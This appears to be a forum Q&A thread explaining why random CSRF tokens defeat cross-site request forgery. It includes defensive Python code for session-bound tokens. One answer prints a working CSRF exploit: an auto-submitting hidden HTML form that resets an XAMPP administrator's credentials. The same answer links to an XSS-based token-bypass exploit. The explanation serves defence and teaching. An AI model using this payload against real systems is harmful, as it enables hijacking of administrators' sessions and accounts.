
Why can CSRF attack be prevented by a random CSRF secret?

to prevent CSRF attacks, a random CSRF secret has been generated.

The above is from symfony: http://www.symfony-project.org/getting-started/1_4/en/04-Project-Setup

Since it's finally operated by users, which is the so-called deputy attack, how can it work by setting that secret?


OWASP (Open Web Application Security Project) has a very good explanation of CSRF; I encourage you to read it and post your questions afterwards.

http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

If you are looking for a sample implementation of how to prevent CSRF, take a look at Django and its write-up: http://docs.djangoproject.com/en/dev/ref/contrib/csrf/


CSRF or XSRF stands for Cross Site Request Forgery. The idea is that the attacker is "forging" an HTTP request when a victim executes HTML or JavaScript created by the hacker. Here is an example CSRF exploit I wrote against XAMPP. The idea is that this HTML/JS is building a POST request which "rides" on an already existing session. The CSRF exploit must be executed by the browser of an XAMPP administrator that is currently logged in.

<html>
    <!-- Hidden form that is submitted automatically; the browser attaches the
         victim's existing session cookie / basic-auth header on its own. -->
    <form action="http://127.0.0.1/security/xamppsecurity.php" method="POST" id="1">
        <input type="hidden" name="_SERVER[REMOTE_ADDR]" value="127.0.0.1">
        <input type="hidden" name="xamppuser" value="admin">
        <input type="hidden" name="xampppasswd" value="password">
        <input type="hidden" name="xamppaccess" value="Make+safe+the+XAMPP+directory">
        <input type="submit">
    </form>
    <script>
        document.getElementById("1").submit();
    </script>
</html>

In order to do this the hacker must know a lot about the request ahead of time, most importantly the destination server and all of the variables. The hacker does NOT need to know the session id or the "basic-auth" header; this is automatically provided by the browser. If you add a randomly generated secret then the request cannot be forged unless the hacker knows that value. It's like having a password for every request you send to the server. A hacker CAN obtain this token value using XSS. This is a more complex attack, but here is an exploit that bypasses token-based CSRF protection using XSS: http://www.milw0rm.com/exploits/7922


Try reading the CSRF FAQ from cgisecurity ( http://www.cgisecurity.com/csrf-faq.html ). When you have questions clarifying the FAQ, we'll be happy to clarify.

EDIT: Quoting from the CSRF FAQ, linked previously, the section that discusses the random secret:

What can I do to protect my own applications?

The most popular suggestion for preventing CSRF involves appending challenge tokens to each request. It is important to state that this challenge token MUST be associated with the user session, otherwise an attacker may be able to fetch a valid token on their own and utilize it in an attack. In addition to being tied to the user session, it is important to limit the time period for which a token is valid. This method is documented in multiple documents; however, as pointed out in mailing list postings, an attacker can utilize an existing browser vulnerability or XSS flaw to grab this session token.
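As an added example that is not part of the question, any answer, Symfony or Django, the following Python sketches the server side of the two answers above: a token bound to the user session and limited in validity time, checked before a state-changing POST. The server key, session ids and form fields are constructed assumptions for illustration.

```python
import base64
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Constructed example: in a real deployment this is a persistent, secret
# per-application value (the "CSRF secret" Symfony generates), not per process.
SERVER_KEY = secrets.token_bytes(32)
TOKEN_TTL = 600  # seconds a token stays valid (the FAQ's "limit the time period")


def _mac(session_id: str, issued_at: int) -> bytes:
    # Binding the MAC to the session id is what makes a token the attacker
    # fetches for their own session useless against the victim's session.
    msg = f"{session_id}:{issued_at}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).digest()


def issue_token(session_id: str, now: Optional[float] = None) -> str:
    """Return 'issued_at.mac' to embed as a hidden field in every form."""
    issued_at = int(time.time() if now is None else now)
    mac = base64.urlsafe_b64encode(_mac(session_id, issued_at)).decode().rstrip("=")
    return f"{issued_at}.{mac}"


def verify_token(session_id: str, token: str, now: Optional[float] = None) -> bool:
    """True only for an untampered, unexpired token bound to this session."""
    try:
        ts_str, mac_b64 = token.split(".", 1)
        issued_at = int(ts_str)
        presented = base64.urlsafe_b64decode(mac_b64 + "=" * (-len(mac_b64) % 4))
    except (ValueError, TypeError):
        return False  # malformed token: reject without revealing why
    current = int(time.time() if now is None else now)
    if not 0 <= current - issued_at <= TOKEN_TTL:
        return False  # expired, or timestamp in the future
    # Constant-time comparison: a plain == would leak the MAC through timing.
    return hmac.compare_digest(presented, _mac(session_id, issued_at))


def handle_post(form: dict, session_id: str, now: Optional[float] = None) -> str:
    """Gate for a state-changing POST such as the auto-submitted XAMPP form."""
    if not verify_token(session_id, form.get("_csrf_token", ""), now):
        return "rejected: missing or invalid CSRF token"
    return "accepted"
```

A forged cross-site form cannot include the token because the attacker's page never sees the victim's session-bound value, so the browser-supplied cookie alone no longer suffices.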


The CSRF secret in Symfony is well explained here: http://www.nacho-martin.com/csrf-tokens-in-symfony
